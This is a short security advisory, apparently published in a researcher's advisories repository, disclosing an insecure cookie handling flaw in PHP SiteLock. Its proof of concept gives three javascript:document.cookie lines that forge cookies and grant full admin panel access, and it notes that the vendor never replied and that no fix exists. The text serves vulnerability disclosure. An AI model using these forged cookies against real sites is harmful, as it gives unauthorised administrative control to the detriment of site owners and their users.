 |
php-siteLock-exploit.txt - advisories - Security advisories that I have release… |
 |
git clone git://jay.scot/advisories |
 |
Log |
|
Files |
|
Refs |
|
README |
|
--- |
|
php-siteLock-exploit.txt (1287B) |
|
--- |
|
1 |
|
2 |
|
3 PHP SiteLock |
|
4 Insecure Cookie Handling |
|
5 =========================== |
|
6 |
|
7 |
|
8 |
|
9 |
|
10 SUMMARY |
|
11 ________ |
|
12 |
|
13 PHP Site Lock: A highly secure website login script which has |
|
14 features like User Authentication & Management, Website |
|
15 Password Protection , protection of pdf , images , etc. |
|
16 |
|
17 |
|
18 |
|
19 IMPACT |
|
20 _______ |
|
21 |
|
22 Leads to full administration rights of the admin panel. |
|
23 |
|
24 |
|
25 |
|
26 VERSIONS |
|
27 _________ |
|
28 |
|
29 Vulnerable systems: All versions |
|
30 |
|
31 Immune systems: None |
|
32 |
|
33 |
|
34 |
|
35 DESCRIPTION #1 |
|
36 ______________ |
|
37 |
|
38 Insecure cookie handling allows anyone to simply create a custom cookie |
|
39 with the values below. This will allow full access to the admin panel. |
|
40 |
|
41 Name - user_type |
|
42 Content - admin |
|
43 Path - / |
|
44 |
|
45 Name - login_name |
|
46 Content - admin |
|
47 Path - / |
|
48 |
|
49 Name - login_id |
|
50 Content - 0 |
|
51 Path - / |
|
52 |
|
53 |
|
54 Proof of Concept: |
|
55 -> javascript:document.cookie="user_type=admin; path=/" |
|
56 -> javascript:document.cookie="login_name=admin; path=/" |
|
57 -> javascript:document.cookie="login_id=0; path=/" |
|
58 |
|
59 Fix: |
|
60 -> None given. |
|
61 |
|
62 |
|
63 |
|
64 ADDITIONAL INFO |
|
65 _______________ |
|
66 |
|
67 |
|
68 Vendor URL - www.phpsitelock.com |
|
69 Underlying OS - Linux (Any), UNIX (Any), Windows (Any) |
|
70 Credit - Jay Scott |
|
71 Message History - Vendor Contacted. |
|
72 No reply after 30 days |
|
73 |
|
74 |
